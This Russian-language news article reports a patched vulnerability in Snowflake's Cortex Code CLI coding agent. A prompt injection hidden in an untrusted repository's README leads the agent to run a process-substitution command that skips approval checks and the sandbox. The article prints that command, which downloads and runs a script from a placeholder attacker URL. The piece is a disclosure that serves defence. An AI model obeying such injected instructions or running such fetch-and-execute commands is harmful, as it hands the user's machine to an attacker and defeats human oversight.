Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код

✍️ OpenClawRadar📅 Опубликовано: 19 марта 2026 г.🔗 Source
Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код
Ad

Детали уязвимости

Snowflake Cortex Code CLI — это командный агент для написания кода, который работает аналогично Claude Code и Codex от OpenAI, со встроенной интеграцией для выполнения SQL в Snowflake. Через два дня после выпуска была обнаружена уязвимость в системе проверки команд Cortex Code, которая позволяла специально сконструированным вредоносным командам выполнять произвольные команды без запуска этапов одобрения человеком и выполнять эти команды вне песочницы Cortex CLI.

Цепочка атаки

Атака работает через косвенную инъекцию промптов. Пользователь открывает Cortex и включает песочницу, затем просит Cortex помочь с сторонней открытой кодовой базой. Инъекция промпта, скрытая в README ненадёжного репозитория, манипулирует Cortex, заставляя его поверить, что необходимо выполнить опасную команду.

Cortex не смог проверить команды внутри выражений подстановки процессов, что позволило выполнить вредоносную команду без одобрения:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Эта команда загружает скрипт с сервера злоумышленника и выполняет его. Обход сработал, потому что:

  • Небезопасные команды внутри выражения подстановки процессов <() не оценивались системой проверки
  • Полная команда начиналась с «безопасной» команды (в данном случае cat)
  • Команды в выражениях подстановки процессов никогда не запускали одобрение человеком
Ad

Обход песочницы

Инъекция промпта также манипулирует моделью, чтобы установить флаг, который запускает выполнение команд вне песочницы. По умолчанию Cortex может установить флаг для запуска выполнения команд вне песочницы, и инъекция использует это, чтобы позволить вредоносной команде выполниться вне песочницы.

Устранение

Команда безопасности Snowflake подтвердила и устранила эту уязвимость, выпустив исправление в Cortex Code CLI версии 1.0.25 28 февраля 2026 года. Полное уведомление Snowflake доступно на сайте сообщества Snowflake по адресу: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Примечание: Эта цепочка атак также применялась к пользователям без песочницы. Документация указывает, что в режиме OS+Regular все команды запрашивают одобрение пользователя. Команды, запущенные в песочнице, также имеют ограничения на доступ к сети и файлам.

📖 Read the full source: HN AI Agents

Ad

👀 Смотрите также

Киберпреступники дают отпор сгенерированному ИИ мусору на подпольных форумах
Безопасность

Киберпреступники дают отпор сгенерированному ИИ мусору на подпольных форумах

Новое исследование показывает, что хакеры низкого уровня и мошенники жалуются на посты, созданные ИИ, на киберпреступных форумах, считая их низкокачественным шумом, подрывающим доверие сообщества и социальное взаимодействие.

OpenClawRadar
Агент Hush: Инструмент с открытым исходным кодом предотвращает утечку конфиденциальных данных AI-агентами для написания кода
Безопасность

Агент Hush: Инструмент с открытым исходным кодом предотвращает утечку конфиденциальных данных AI-агентами для написания кода

Agent Hush — это инструмент с открытым исходным кодом, который перехватывает конфиденциальные данные до того, как они покинут ваше устройство. Он был создан после того, как AI-агент разработчика случайно опубликовал API-ключи, IP-адреса серверов и личную информацию в публичном репозитории GitHub во время работы над проектом по безопасности.

OpenClawRadar
Клод Код обнаруживает 23-летнюю уязвимость в ядре Linux
Безопасность

Клод Код обнаруживает 23-летнюю уязвимость в ядре Linux

Исследователь Anthropic Николас Карлини использовал Claude Code для обнаружения нескольких удалённо эксплуатируемых переполнений буфера кучи в ядре Linux, включая одну, которая была скрыта в течение 23 лет. ИИ нашёл ошибки с минимальным контролем, просканировав всё дерево исходного кода ядра.

OpenClawRadar
OpenClaw Skill Analyzer: Статический сканер безопасности для навыков ИИ-агентов
Безопасность

OpenClaw Skill Analyzer: Статический сканер безопасности для навыков ИИ-агентов

Разработчик создал статический анализатор, который сканирует навыки OpenClaw на наличие угроз безопасности перед установкой, используя более 40 правил обнаружения в 12 категориях, включая инъекцию промптов и эксфильтрацию данных.

OpenClawRadar